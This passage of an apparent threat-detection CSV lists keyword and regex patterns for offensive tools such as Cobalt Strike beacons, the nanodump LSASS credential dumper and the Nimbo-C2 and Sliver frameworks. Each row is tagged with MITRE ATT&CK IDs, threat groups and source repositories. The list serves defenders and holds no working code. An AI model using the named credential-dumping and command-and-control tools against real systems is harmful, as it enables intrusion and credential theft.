- TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35627" "*be9cd67ca6ef0d87c8dacebef75d1f62b38cff5b8ba4ad2f0eb382ab54081317*",".{0,1000}be9cd67ca6ef0d87c8dacebef75d1f62b38cff5b8ba4ad2f0eb382ab54081317.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","35628" "*Beacon Payload Generator*",".{0,1000}Beacon\sPayload\sGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","#content","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35631" "*beacon.*winsrv.dll*",".{0,1000}beacon\..{0,1000}winsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","35632" 
"*beacon.CommandBuilder*",".{0,1000}beacon\.CommandBuilder.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","35633" "*beacon.dll*",".{0,1000}beacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35634" "*beacon.elf*",".{0,1000}beacon\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","35635" 
"*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35636" "*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35637" "*beacon.nim*",".{0,1000}beacon\.nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","35638" "*Beacon.Object.File.zip*",".{0,1000}Beacon\.Object\.File\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","35639" "*beacon.ps1*beacon.exe*",".{0,1000}beacon\.ps1.{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","35640" "*beacon.x64*.dll*",".{0,1000}beacon\.x64.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35641" "*beacon.x64*.exe*",".{0,1000}beacon\.x64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35642" "*beacon.x64.dll*",".{0,1000}beacon\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","35643" "*beacon.x86*.dll*",".{0,1000}beacon\.x86.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35644" "*beacon.x86*.exe*",".{0,1000}beacon\.x86.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35645" "*beacon_api.h*",".{0,1000}beacon_api\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","0","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","35646" "*beacon_bottom *",".{0,1000}beacon_bottom\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
